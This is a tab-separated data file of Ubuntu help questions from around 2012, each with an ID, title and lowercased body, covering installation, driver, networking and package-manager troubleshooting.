222387	can not upload songs to my iphone 4 running ios 5.1.1 on ubuntu 12.10	using either rhythmbox or banshee i can move music from my iphone to my computer but i can not move music from my computer to my iphone . if i drag a track to the phone it shows the progress bar and tells me it has uploaded but when i go into my phone the song is not there . i am running ios 5.1.1
222389	how to install gee tee dee ( lightweight task manager )	official site when i download the .deb file and open it with software center it says dependencies not satisfied ...
222392	remmina problem : a valid certificate for the wrong name	i am using remmina to connect to a remote desktop . i was constantly getting errors and handled it by deleting the content of : /home/zxy/.freerdp/known_hosts after that i could successfully connect to the remote desktop 2 times but now i am getting the following error could not find a solution : remmina plugin rdp ( type=protocol ) registered . remmina plugin rdpf ( type=file ) registered . remmina plugin rdps ( type=preference ) registered . remmina plugin vnc ( type=protocol ) registered . remmina plugin vnci ( type=protocol ) registered . remmina plugin sftp ( type=protocol ) registered . remmina plugin ssh ( type=protocol ) registered . connected to 10.92.52.153:3389 @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : certificate name mismatch ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ the hostname used for this connection ( 10.33.22.253 ) does not match the name given in the certificate : vpa a valid certificate for the wrong name should not be trusted ! ssl_read : i/o error how can i solve this problem ? regards
222394	can i have some help installing python-captcha ? dpkg error 1	i have searched around the forums and tried a number of solutions but nothing i have tried has fixed my problem . here is the terminal info john @ ubuntu : /var/lib/dpkg $ sudo apt-get install python-captcha reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : python-captcha 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/384 kb of archives . after this operation , 516 kb of additional disk space will be used . ( reading database ... 182992 files and directories currently installed . ) unpacking python-captcha ( from ... /python-captcha_0.4-1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/python-captcha_0.4-1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/pyshared/captcha/base.py ' , which is also in package python-pycaptcha 0.4-1~precise1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/python-captcha_0.4-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
222395	ssh tunneling suddenly not working	i have a home pc running ubuntu 12.10 . in order to make sure that my data is n't being monitored in public , i had in the past used a subscription vpn service . i decided to research alternatives and i found out that openssh makes it fairly easy to create a socks proxy which can be used with firefox and putty . after much trial and error , i finally have a server that i can connect to remotely and use bash commands in . ( i had to use port 80 for the ssh server as a lot of the places blocked traffic through the `` usual ports '' such as 22 . ) the real issue came when i tried to use this as a proxy . i used putty and went to the ssh tunnels section and added a dynamic forwarded port and set the port to 80 . i then went into firefox and selected socks v5 , 127.0.0.1 as the ip address , and the port as 80 . this seemed to work perfectly and a `` whats my ip '' google query returned the correct home ip address -- but then it stopped working . the shell itself continued to work and i used it to reset the home ssh server to no avail . i have absolutely no clue what it is going wrong and any assistance will be greatly appreciated . if you need any further information i will be happy to provide it .
222396	samsung series 5 a6 ultrabook	i 'm a fan of ubuntu , but for now i want my installation to be perfect for my new laptop , its a series 5 of samsung with a6 processor . somebody suggest what to do ? or mention any problems related to this ? im more concern of the drivers to increase its performance because i am to develop an android app . i need `` i dont know '' to make this unit run as fast as possible without any dangerous tradeoffs . also i read some forum saying that their units are overheating . -_- somebody help me please . and also i want to switch to gnome 3 . and last thing , is there any differences in performance if i use alongside , replace or custom in formatting ?
222397	ubuntu 12.10 help ! everything is incredibly slow	i installed 12.10 from usb onto this machine . intel celeron 2.00 ghz 496mb ram i had to modify gnu-grub to read `` nomodeset '' or i could not see the gui . i have an nvidia graphics card . takes about 2 minutes to boot . the icons on the left of desktop take about 1 min to slowly open their menu . have a network connection but mozilla is 404 and i can not update . where can i find a blow by blow explanation for troubleshooting and repairing this problem ?
222404	issues while booting from a non-live usb	i recently installed ubuntu onto a 16gb flash-drive . i am not talking about a liveusb , i mean i installed full ubuntu onto the drive . my problem is that when i have tried booting from the device , all i get is the black screen with the flashing `` _ '' in the top left corner . this persists for at least 15 minutes ( at which point i give up ) . i outline my process for creating the usb below . my question is what exactly could be causing this , and how can i fix it ? from a different liveusb i chose the install option , after the timezone info and others , i chose `` something else '' for installation type . on the single partition of my flash drive , i chose `` ext2 file system '' , checked the format drive box , and set the mount point to `` / '' ( the root ) . after warning me about not having a swap partition ( which i was told would not be a problem ) , i went through the rest of the install without a single issue . but now when i boot from the drive , i get the persistent blank screen .
222405	motion is saving images to home directory	i was interested in setting up a home security network . i installed motion in ubuntu 12.04 and it worked fine . then the next day i went to play around with it some more but the images are not being saved to /tmp/motion as the configuration file states , but to the home directory : [ 1 ] file of type 1 saved to : ./01-20121126211634-12.jpg any idea if there is another setting that has more priority than the motion config file ?
222410	how to install wi-fi firmware without an ethernet cable	i 've recently installed ubuntu 12.04 . i know there are many questions with answers about the `` firmware missing '' problem . my problem is that i have no way to get to an ethernet cable for i am on a college campus and have n't the time . is there a place i could download it and put it on a usb ? i have a dell studio 1535 laptop .
222411	when running playonlinux i get the error `` playonlinux can not find 7z . ''	when trying to run linux i get the error message : playonlinux can not find 7z . you should install it to use playonlinux how do i install `` 7z '' ?
222414	used dban to wipe lenovo u410 then installed ubuntu . need to install windows 8 , but i get an error .	when i try to boot from my windows 8 usb ( tested on a separate pc ) , i get this error text `` the boot configuration data for your pc is missing or contains errors . '' i want to install windows again so i can fix a battery issue i 'm having . lenovo 's power management app has an option to keep the battery at 60 % if the laptop stays plugged in most of the time . i enabled this , then formatted without changing it back . i think there might be a raid setup that i may need to remove or something . i do n't mind removing ubuntu and starting fresh . i would just love some help with all this , i 'm a noob when it comes to linux .
222416	how to install emmet.io ( former zen coding ) on sublime text 2 on ubuntu precise ?	or in other words , has any of you been able to install pyv8 and google v8 without pain ? hello , everyone ... well , my question is regarding to install the emmet.io plugin on sublime text 2 but so far i can find and easy & straightforward to install it . thanks in advance for your time . this is the url to the plugin https : //github.com/sergeche/emmet-sublime
222419	bluetooth pan/dun on ubuntu ?	is networking via bluetooth pan or dun still viable on ubuntu ? all bluez instructions i could find fail to pair . blueman says that there is no dhcp server installed regardless of dhcp being installed and working . looking for somone who has this working : )
222420	version 12.10 wireless not working after upgrade	i have a lenovo t 61 unknown wireless adapter and my wireless worked in v 12.04 but no longer connects with v 12.10 , what should i do to resolve this problem ?
222423	what does it means : `cgroup_disable=memory` in my `dmesg` ?	my dmesg command give me that result in particular : [ 0.000000 ] please try 'cgroup_disable=memory ' option if you do n't want memory cgroups what does it meanings and how to know what i want around my 'memory cgroups ' ?
222431	the system always requires reboot	the system always requires reboot . writes : `` restart your computer to complete the update . '' after rebooting the message again . ubuntu 12.04.1 lts precise
222439	any benefit of /home ubuntu partition	i want to have dual os of win8 & ubuntu 12.10 . provided that ubuntu can access ntfs partition of windows but same ca n't be said about windows this leads to a question mark on the significance of having /home partition while installing ubuntu . as far as i know /swap & / are the two partitions directly used by ubuntu to store programs , installation & stuff while the documents/media resides in /home . now because ubuntu releases are more frequent than windows & updates needs backup & relate stuff , so i came to decision to not to use /home at all , rather keep all my documents/media in ntfs , which would be untouched while upgrading ubuntu as win updates are once in a decade ! is my thinking correct ? if yes , what would be the minimum space i should allot to /home plus how much i should allot to / one must know that i plan to use heavy applications like maple , matlab & sagemath on ubuntu .
222442	ubuntu 12.04 crashes when using ssh -x	i am using a double boot of win 7 and ubuntu 12.04 in my laptop hp pavilion dm4 . i am attempting to use ssh -x to connect to server running centos and be able to open a visual interface on wich i am using tec360 . i am successful at starting the interface and open tec360 , but after a few seconds it crashes and sends me back to the log in screen ( as if i would have restarted the computer ) closing everything that was open . does anyone have any idea of what is happening ? how to fix it ?
222453	trying to recover deleted ubuntu partition	i made a mistake in logging into my 200 gb ubuntu partition . i could not access grub after that . using a live cd i then ran boot_repair and apparently deleted the partition , i guess because i ran it from my 70 gb windows partition . i can send the results of boot_info before that and of boot_repair . then i ran testdisk , which apparently only found dev/sda/ -320gb / 298 / gib - wdc - wd3200bevt-22a23t0 . was there any more i could have done with testdisk ? i looked at the testdisk_step_by_step example and found no way forward given that no other partitions turned up i have run gpart and found this : /sda1 - 15 gb /sda2 - system reserved /sda3 - 70.15 gb /sda4 - extended 212.84 unallocated - 209.10 /sda5 - unknown 3.74 . i have been told i can recover the partition using gparted 's rescue start end command , but i do n't know what to enter for start and end . edit : testdisk deeper search stated that `` the following partitions ca n't be recovered '' and listed a 220-gb linux partition 6 times . then it stated that `` the current number of heads per cylinder is 255 but the correct value may be 128 '' and i could try to change it in the geometry menu ( because apparently these are overlapping partitions ) so should i do that ?
222460	unable to install software	i 'm unable to install packages using apt-get install command . it produces an error which says : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing . after updating it is still unable to install the software . i tried it on both 32 and 64 bit ubuntu . i also could not install it thru the ubuntu software center [ failed to download package files , check your internet connection ] - i can access the internet . the things that i 'm trying to install are : mysql-server and libssl-dev . i am clueless as to how to go on . any help with troubleshooting would be much appreciated . thanks ! p.s : i have tried as root and with sudo screenshots : installation thru ubuntu software center , installation using apt-get install
222462	how should i connect my vpn connection on ubuntu 12.04 ?	i am trying to install ubuntu 12.04 but when i get to a certain part it says that i need an internet connection to install some third-party software . now i have tried to setup my connection but so far i have been unsuccessful . on my windows laptop , i would just simply enable my lan connection , then i would open rasphone dialer and type my username and password and start the vpn connection but in ubuntu , i have tried to do the same thing in the vpn tab but it wont connect . i have also googled this problem but did not find anything helpful . i hope you help me solve my problem . thanks .
222465	how do i watch netflix on ubuntu 12.10 ?	i 've tried running netflix in firefox and chrome but it says i need windows or mac osx . is there any way to work around this ?
222468	ubuntu studio boots , though it starts to flash on monitor in black and white	so , i installed ubuntu studio from dvd and the installation should work just fine . i assume the problem would be with hardware or bios ? i have ati radeon graphics processor as graphics card and asus m5a97 mobo . bios has n't ever been updated . would there be some compatibility problem ?
222469	deleting specific lines and duplicates from a 11gb wordlist text file	i have an 11gb wordlist file which is already sorted as each word is on its own line . i need to remove duplicates and lines starting from 077 . i guess i need to run sed and sort -u together but i also want a live output ( display whats happening in terminal ) and if possible display the time left . all of this in one command and it must be able to run optimally at full performance in ubuntu 12.10 . time is not very important but if there is a way for me to calculate the eta , i might be able to borrow my dad 's i7 based cpu which should process it faster obviously otherwise i 'll have to use an older core 2 cpu . so please give me the complete command , be it sed/sort/awk to do this ( whichever is most optimal ) .
222470	mount ubuntu shares remotely with mac and windows	first time on here so please be gentle ! i have setup a small school network with a ubuntu 12.04 server for use as a fileserver mainly . i have managed to set the server up ( all command line based - no gui ) and setup the samba shares , which works really well internally . internally , the school have a combination of mac 's and windows machines and they can all access the shares happily . the school has a fixed ip adsl connection and i have added a route in the router to allow me remote access to the server using ssh ( port 22 ) . that also works well . all good so far ! what i now want to do is allow remote access to the shares . i have done a bit of reading and thought i had found the answer with sshfs but i am still non-the-wiser . so , my basic questions is : in windows , how can i map to the ubuntu shares across the internet through the router ? in mac os , how can i add the remote share across the internet ? the school used to have a windows server and the users were used to creating a vpn and then pulling up the share folders etc , but i 'm unsure how to do this with the ubuntu server . i assume i need to add another route through the router too allow for sshfs or something similar ? thanks in advance ... donald
222474	hard drive and dvd drive are not being detected by the bios	my hard drive and dvd drive are not being detected by the bios when i go in to the boot option menu by pressing f12 . when i put the hard drive in a different computer it 's being detected . i am assuming it 's either the mother board or the bios . since the hdd is not being detected i have installed ubuntu on a flash drive , but even that has become so slow , that it takes around 5 minutes for it to boot . i want to flash the bios before i think of changing the motherboard . i have downloaded the updated file and it has a flash.bat and a afudos.exe . i have to run the .bat file . i downloaded the dos in a box and went to the dos directory where the .bat file is and tried to run it , but it gives me the error message `` this program can not run under this operating system '' any help would be appreciated
222476	shall i go for 12.04 or 12.10 if i want stability and speed ?	i think this might be the most annoying question for the pros here , but i 'd really like to know which version is better if i 'd like a super fast start-up and processing speed . i know it rather depends on the cpu , but the os is important too . i dont really care for the long term support since i normally re-install my system once a year . i 'd just like to choose a stable and fast os and i have been reading all sorts of things , but no one has given a proper answer to my question/doubt . thanks a lot . update : if someone has already asked this , then please merge this with that post and close it . thanks .
222477	problem booting the ubuntu 12.04.01 os due to bad sectors on the hdd	i use ubuntu 12.04lts ( 64-bit ) desktop edition . lately i tried to upgrade it to ubuntu 12.10 . everything was going good , but due to some work i could n't complete the upgrade , so i disconnected the internet connection . then my lappy reverted back to the original state . i thought everything was fine . but the next time i started the lappy , it said it was unable to mount the root drive . please i need to recover my data from the lappy . i tried using the live-cd and then accessing the hdd but it shows the following error : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so then as said in the above error i opeed the terminal and typed `` dmesg | tail '' . it said : ubuntu @ ubuntu : ~ $ dmesg | tail [ 1446.284420 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 1446.284430 ] 1c c5 9b 01 [ 1446.284435 ] sd 0:0:0:0 : [ sda ] add . sense : unrecovered read error - auto reallocate failed [ 1446.284444 ] sd 0:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 1c c5 9b 00 00 00 08 00 [ 1446.284453 ] end_request : i/o error , dev sda , sector 482712321 [ 1446.284467 ] ata1 : eh complete [ 1451.533783 ] jbd2 : failed to read block at offset 12896 [ 1451.533789 ] jbd2 : io error -5 recovering block 12896 in log [ 1454.136060 ] jbd2 : recovery failed [ 1454.136069 ] ext4-fs ( sda1 ) : error loading journal to provide further info . about my system , i have done several hdd tests/checks from the live cd . they do n't show that the disk is getting old . all they say is the 's one bad sector on the hdd . secondly , i have not partitioned my hdd . i use the 497.6 gb for my ubuntu os & the rest is allotted to swap filesys . also visit here for more info . https : //www.quora.com/ubuntu/problem-booting-the-ubuntu-12-04-01-os-due-to-bad-sectors-on-the-hdd
222478	my home folder is gone	i just installed a fresh 12.04 , and following a recommendation , i defined 3 partitions : root , home , and swap . after installing some 452 updates , i restarted the computer , and found myself in a login loop - each login returned me back to the login screen . so i logged in with ctrl+alt+f1 , and found that my home folder is gone ! `` ls /home '' shows no files ! where can i find my home folder ? how can i restore my system back to normal ?
222479	samba can not access some network	my laptop is ubuntu 12.04 and i 'm trying to access shares on certain network . there are 3 networks , lets say it is networka , networkb and networkc . i can access network a and network b just fine but i can not access network c. before , it was fine , but after disconnected from the network , and reconnect , i can not access network c. my smb.conf already included workgroup = networkc name resolve order = bcast host i 'm so confused . i never had this kind of problem when connecting between windows . there is no issue with ip address as i can ping the target computer on networkc without fail .
222487	why does my wireless mouse scroll jumps up and down when i only scroll in one direction ?	hi i have a wireless mouse : [ 5362.964326 ] usb 2-2 : new full-speed usb device number 2 using ohci_hcd [ 5363.186052 ] input : mosart semi . 2.4g wireless mouse as /devices/pci0000:00/0000:00:12.0/usb2/2-2/2-2:1.0/input/input12 [ 5363.186570 ] generic-usb 0003:062a:3281.0001 : input , hiddev0 , hidraw0 : usb hid v1.10 mouse [ mosart semi . 2.4g wireless mouse ] on usb-0000:00:12.0-2/input0 [ 5363.186614 ] usbcore : registered new interface driver usbhid [ 5363.186617 ] usbhid : usb hid core driver and it works out of the box on my ubuntu 12.04 or 12.10 however if i scroll the mouse wheel it is very annoying that although i scroll slowly down , the screen jumps in both directions randomly making the scroll completly useless and unproductive . i 've tryed other sugestions as unplug and replug , and unload the usbhid module and reload in my x session but without success . if it can help to troubleshoot the problem this mouse has a 1000dpi resolution but i can not see what is wrong . does anyone have the same issue and got it fixed ?
222488	eclipse 3.7.2 not recognizing adt after plugin updates	i 'm using eclipse 3.7.2 with adt plugin installed . i updated all the plugins i had by going to the option help- > check for updates . after the update , on restarting eclipse , i 'm no longer able to see any options corresponding to android/adt . i tried re-installing by going to help- > about eclipse platform- > installation details and removing adt , ddms , heirachy viewer and traceview . then going to help- > install new software.. and installing them again . but it did n't work . i have searched for a solution but none wroked . is there a way to fix this ? edit : giving it 24 hours till i re-install eclipse from scratch .
222489	undelete files on an ext4 partition in-place	i 've just removed most of the files in my home directory accidentally , using rm -f command . anyway , i searched and found some of the tools for recovering deleted files , like extundelete , foremost and photorec . the problem is that i do n't have an extra partition to specify as the output-dir to save the recovered files to . all of my hard disk is in one partition and it 's the one i 'm trying to recover . and on the other hand , the files to recover are pretty huge . so my question is , how can i recover deleted files into the same partition as the original files ? does any of the tools available recover files in place ? i mean hypothetically speaking it must be doable to restore a file pointer into the filesystem without actually copying the file body ! ? actually it must be much faster and much easier for an application to do that ! ( if you ask me )
222493	ubuntu 10.10 - startx not working	so i have an ubuntu 10.10 and windows 7 on same hdd , different partitions . if i choose to boot into linux when i-m in grub , everything works perfectly . the problem is , if i 'm trying to start the ubuntu from vmware player ( from a physical partition ) - gnome ( startx ) does n't work . log here : http : //pastebin.com/nrzmm0en any advice ? thanks , alex
222495	firewall stopped and disabled on system startup error : problem running ufw-init	i am trying to set a vpn server on my pc ( ubuntu ) . i am following a tutorial , http : //cviorel.easyblog.ro/2009/02/09/how-to-set-up-a-vpn-server-on-ubuntu/ . i made changes in various files including /etc/ufw/before.rules file . when i run command sudo ufw disable & & sudo ufw enable then i got following error message : firewall stopped and disabled on system startup error : problem running ufw-init ufw version is 0.31.1-1 can anyone please guide me ! i do n't have any prior experience ... please can someone tell me the steps to fix this problem ?
222501	running application in `` kiosk mode ''	i am trying to configure ubuntu to run an application only , without giving the user the ability to access a terminal or any other part of the system . this application is a fullscreen python gui . i have already seen this thread , booting in kiosk mode , but when i tried to this this for my python application , nothing happened . also , is it possible to have ubuntu auto-login without a password and automatically decrypt the folder where the application is being launched from . i want to do this to ensure that no one can remove the hard drive from the device and copy the python files over to another system . thank you for your help .
222505	chrome always maximize windows in gnome shell	new window is maximized automatically , i need a way to stop this . i am on ubuntu 12.10 with gnome shell . what should i do ? what program is responsible for the window size , i notice in unity chrome always remember its windows sizes . firefox , too .
222506	brightness adjustment on desktop computer	i have ubuntu 12.10 i need an application/software that can increase and decrease my brightness . i know i can do it through my pc monitor but i do n't want that . i want to control it through a software . i personally can not find an application about this issue . i know that it is possible because the os has the fading effects before screen savers . i want to control brightness through a software for desktop pc .
222512	`` ( cron ) info ( no mta installed , discarding output ) '' error in the syslog	i have a fresh install of ubuntu 12.04.1 lts an a number of servers . i have not added any cron jobs or edited my crontab on those servers , however , at around the same time for each machine , i get a 75 % cpu spike and the following info in my syslog at the time of the spike : cron [ 8380 ] : ( cron ) info ( no mta installed , discarding output ) i have mono-complete installed and am running a service stack webserver . what is the best way for me to stop this from happening ? i would like to be able to remove the cpu spike .
222513	ubuntu 12.10 stopped during booting	good morning , i 'm very new to ubuntu . i decided to change to ububtu ( 12.10 ) for my old laptop ( compaq presario r3000 with amd athlon xp 2800+ ) that previously used windows xp . after the installation , the pc restarted but , after a certain activity of the hdd stopped . menwhile , no information from the screen ( blank ) . then i retried in recovery mode and the activity stopped at a certain point . i write the last two lines : [ 11.020922 ] pcmcia_socket pcmcia_socket0 : > cs : io port probe 0x3000-0x7fff : [ 11.021676 ] excluding 0x3000-0x30ff 0x3400-0x34ff 0x3800-0x38ff 0x3c00-0x3cff i do n't know how to solve the problem . thanks in advance for the help .
222515	is there anything software-related i can do , to make ubuntu play high-quality mkv files smoothely ?	i 've noticed that beyond let 's say..a 20 mb/s bitrate , a movie would lag , played on my laptop.. it results in me missing the highest bitrated scenes of a movie.. and sometimes having to compromise for watching the movie at a lesser quality.. i was wondering if there 's anything i can do software-wise to play movies smoothley.. ? at the moment ubuntu is installed with all the default settings on an 60gb ssd i use vlc ofcourse.. i also have 2 1tb hdd - maybe i can use them as pagefiles ? i do n't really know alot about this so maybe this is irrelevant.. i took the laptop battery out since it was dead..but i think this is also irrelevant.. would appriciate a response , even if there 's nothing that can be done software-wise : )
222516	lvd1 goes blurry if hdmi ( dfp1 ) gets plugged in	i was wondering if anyone can explain why all of a sudden on 12.04 when i plug the hdmi in the text on my laptops monitor gets blurry . when i unplug the hdmi everything goes perfect again , text is crisp , plugin the hdmi text goes blurry . screen 0 : minimum 320 x 200 , current 3280 x 1080 , maximum 3280 x 1920 lvds connected 1360x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1360x768 60.0*+ 1366x768 60.0 + 1280x768 60.0 1280x720 60.0 1024x768 60.0 1024x600 60.0 800x600 60.0 800x480 60.0 640x480 60.0 dfp1 connected 1920x1080+1360+0 ( normal left inverted right x axis y axis ) 160mm x 90mm 1920x1080 30.0 + 60.0* 59.9 30.0 1776x1000 59.9 30.0 1680x1050 60.0 59.9 1400x1050 60.0 59.9 1600x900 59.9 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 60.0 1280x768 59.9 1280x720 60.0 59.9 1024x768 75.0 70.1 60.0 1152x648 59.9 1024x600 75.0 70.1 60.0 800x600 72.2 75.0 60.3 56.2 800x480 72.2 75.0 60.3 56.2 720x480 60.0 30.0 59.9 640x480 75.0 72.8 59.9 crt1 disconnected ( normal left inverted right x axis y axis ) the tv is actually 1080p @ 60 not @ 75 and definably not preferred @ 30 . both are set to 60hz . the proprietary driver is installed and says it 's working alright to me .
222517	lenovo e420s overheating	i recently bought a lenovo e420s and decided to install ubuntu ( first time ) . the interface is great , but the computer overheats horribly ( the fan is on full all the time and the cpu temperature is much higher than in windows ) . in other words , it 's not a fan problem , but an os problem . does anybody have a fix that is implementable by a luddite ? i 'd like to use linux , but it 's not possible if it turns my computer into a radiator . thanks .
222524	cleaning up ubuntu files from windows	installed ubuntu using wubi along side windows vista but on a separate drive ( say e : , while my windows was in c : ) . it was all working fine . one fine day , when i logged into ubuntu , got a popup from ubuntu software center that a new version of ubuntu is available for upgrade . triggered the upgrade after ubuntu 's upgrade , windows vista would work fine , but ubuntu wouldnt bootup , though i see ubuntu listed in the bootup screen tried to uninstall ubuntu using wubi , but it woudlnt uninstall but rather throw an error i did a rather nasty thing here , by trying to format the drive , in which i had ubuntu to reinstall it . managed to delete all the files in the ubuntu drive . however , when i checked the disk size , it says , 3.5 gb used of 34 gb . so , somehow the ubuntu files are n't fully removed . tried formatting the drive from windows using , disk manager and also tried with easeus disk partition manager as well , couldnt format it . could n't retrieve this space . any idea how i can acquire this space back ?
222528	sd card reader not working in ubuntu 12.04	i have a read many other posts on this issue and believe that ubuntu 12.04 is not even recognizing my sd card reader as just that : computer model : metabox ( australian builder of clevo laptops ) / clevo p150em os : ubuntu 12.04 ( 64 bit ) cpu : intel ( r ) core ( tm ) i7-3720qm cpu @ 2.60ghz hd : 120gb intel 550/520mb/s ssd according to the people who built my computer , the specs of the sd card reader in my comp are as follows : manufacture : realtek semiconduct corp . location : pci bus 3 hardware id : pci\ven_10ec & dev_5289 & subsys_51051558 physical device object name : \device\ntpnp_pci0015 here are the relevant outputs of the following commands run from the terminal : sudo lshw *-generic unclaimed description : unassigned class product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : latency=0 resources : memory : f6a00000-f6a0ffff sudo lspci -v -nn 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device [ 10ec:5289 ] ( rev 01 ) subsystem : clevo/kapok computer device [ 1558:5105 ] flags : bus master , fast devsel , latency 0 , irq 4 memory at f6a00000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ b0 ] msi-x : enable- count=1 masked- capabilities : [ d0 ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 00-00-00-00-00-00-00-00 does the unassigned details of these outputs mean that ubunutu des n't know that the sd card reader is one and what do with it ? and if so how should i go about fixing it ? ? cheers ; )
222529	install ubuntu 12.04 lts with amd radeon hd 3870 error	i 'm very new to ubuntu . i try to change my desktop for ubuntu because i 'm bored with windows 7 and i 'm try to learn about ubuntu . first i 'm try ubuntu 12.04 lts 64bit . after i choose `` instal ubuntu '' my computer restart and i getting error `` hyper transport synch flood error '' . i change my instal from cd to usb bootable device , disable hpet and all integrated device , underclock my cpu , increase the voltage , but i 'm still get the error . so i 'm trying the older version 10.7 , but i 'm getting the same error . when my friend lend his vga ( amd hd 4850 ) , i can instal it without any error . after finish installing , i swap to my amd hd 3870 , it ca n't boot into ubuntu again . when i change into 4850 again , it can boot normally i read the kernel support amd 3870 , it has the same kernel support with 4850 so i do n't think it 's kernel fault in this problem . i do n't know to solve this problem , maybe someone can help me with this problem ... . thanks in advance ... ps : when i try to install opensuse 10.3 i get no error , but when i try opensuse 12.2 i get the same error as ubuntu . my computer spec : amd phenom ii 550 msi 770-g45 memory gskill ddr3 2x4gb amd radeon 3870 seagate 250gb seasonic gold x 650watt
222530	what does 'convert the .iso file to .img ' mean ?	i was gong to install ubuntu on my mac using usb . at the moment i 'm reading instructions and i do n't understand them : here are the instructions it says convert the .iso file to .img using the convert option of hdiutil can anyone explain me what .img is , what it is for , and where i can get it ?
222531	maas does n't install node	i 'm installing maas server with an external dhcp server . i have used ubuntu server 12.10 and the maas daily builds ppa repository . i have created the admin account and i ran the sudo maas-import-pxe-files command without errors . the maas web interface did n't show any error . when i run a node with pxe , it enlists in web interface and then i click on accept and commissioning . i start again the node with pxe , it starts commissioning . it downloads the updates list , after that the node starts to upgrade . the node status is ready on the web interface , but the node does n't install the system . the logs do n't show errors , but the file maas.log is empty . i have the next packages installed : maas maas-cli maas-cluster-controller maas-common maas-region-controller python-maas-client
222533	reinstall ubuntu keeping my data intact	i have recently upgraded my desktop os from ubuntu 12.04 to 12.10 ( complete re-install ) . before the switch i made a list of all programs installed on my ubuntu 12.04. sudo dpkg -- get-selections > file after that i re-installed ubuntu 12.10 and when all was done i performed the following command : sudo dpkg -- set-selections < file sudo apt-get dselect-upgrade here is when the problems start : i get several warnings like this when performing the commands above : dpkg : warning : package not in database at line xxx and many of the programs are not installed . i do n't know what the line means . i have searched the web , and it seems that i 'm not the only one suffering from this . i have not find any solution that worked for me . any ideas what is causing this ?
222539	how to add a command-line 's window on software-center ?	i hate not seeing the command line on the software-center , and if i want to see it , i have only the console-system to install the software . installing a software without the name of the software is near to impossible , and with the `` aptitude -- full-resolver '' command , it is a little boring ... is possible to implement a command-line window in the software-center , and how do i do it ?
222542	ltsp ubuntu 12.04 thin clients login problem	i login successfully from a thin client but a few seconds later the screen becomes black and returns back to the login screen
222545	is it possible to install cuda and nvidia drivers in ubuntu 11.10 that is installed in an external hdd ?	we have to do cuda 5.0 programming on ubuntu 11.10 . since we are using a shared workstation , we have chosen to go for a external hdd installed ubuntu . will this ubuntu work as the normal pc version supporting the drivers and softwares ?
222546	priblem with update manager	i have a problem with my pc . is that my `` update manager '' does not at my disposal the new verision of ubuntu 12.10 to i update my pc . i have ubuntu 12.04 lts verision 64-bit i ca n't update to 12.10 since update manager does n't offer it to me .
222549	get mac address of accesspoint	how can i find out what the mac address of the w-lan accesspoint i 'm connected to is ?
222551	eclipse on ubuntu 12.10 get stuck frequently	i have ubuntu 12.10 ( 32bit ) . and i have installed : eclipse java ee ide for web developers . version : juno service release 1 build id : 20120920-0800 which i downloaded from eclipse website . while working the eclipse causing high cpu , and basically get stuck . it happens when i try to search a file , search a word in y work space etc . do have any idea ? how can i fix this\understand what is the problem ? thanks !
222559	what is wrong .h	i have aquired c++ for dummies , old for a windows gnu compiler . and i get this error , thinking it needs a different variable of the iostream ? i 'm new to this i know i am not posting the way it should look . like the screen shot is very small , sorry if i can not get a response i 'll try a different angle .
222560	bug installing tex/latex/texlive packages makes subsystem unusable	i am having problems installing tex/latex/texlive packages on 12.04 . my setup : > cat /etc/issue ; uname -a ubuntu 12.04.1 lts \n \l linux ubuntu 3.2.0-33-generic-pae # 52-ubuntu smp thu oct 18 16:39:21 utc 2012 i686 i686 i386 gnu/linux i tried starting from scratch : apt-get purge $ ( dpkg -- get-selections | cut -f 1 | grep -- color=never '^tex\|tex $ ' | paste -s -d ' ' ) but trying to install things : apt-get install texlive-base still fails : > dpkg -- status texlive-base package : texlive-base status : install ok half-configured this might be related to bug : http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=648278 but the solution there does not fix the issue for me ! dump of apt-get install textlive-base @ http : //paste.ubuntu.com/1400458/ dump of dpkg -- configure -a 2 > & 1 @ http : //paste.ubuntu.com/1400609/ dump of dpkg-query -- status texlive-base @ http : //paste.ubuntu.com/1400638/ dump of /etc/libpaper.d/texlive-base @ http : //paste.ubuntu.com/1400645/
222561	typing break in xubuntu 12.04	i installed ubuntu 12.04 , and loathe the new interface so much i 've switched to xubuntu with sudo apt-get install xubuntu-desktop . very happy with that so far . but the typing break i always used to have set is part of gnome . is there an equivalent typing break app in xubuntu ?
222562	how can i stream music files from android phone via wifi on ubuntu 12.10	have a wi-fi network at home have ubuntu 12.10 installed on my laptop connected to home wi-fi have an android based cell phone connected to home wifi can i play ( stream ) my music files stored in the cell phone via wifi on my rhythmbox music player or any other free software on my laptop ? thanks in advance p.s . i have already done extensive search but could n't find solution to my requirements .
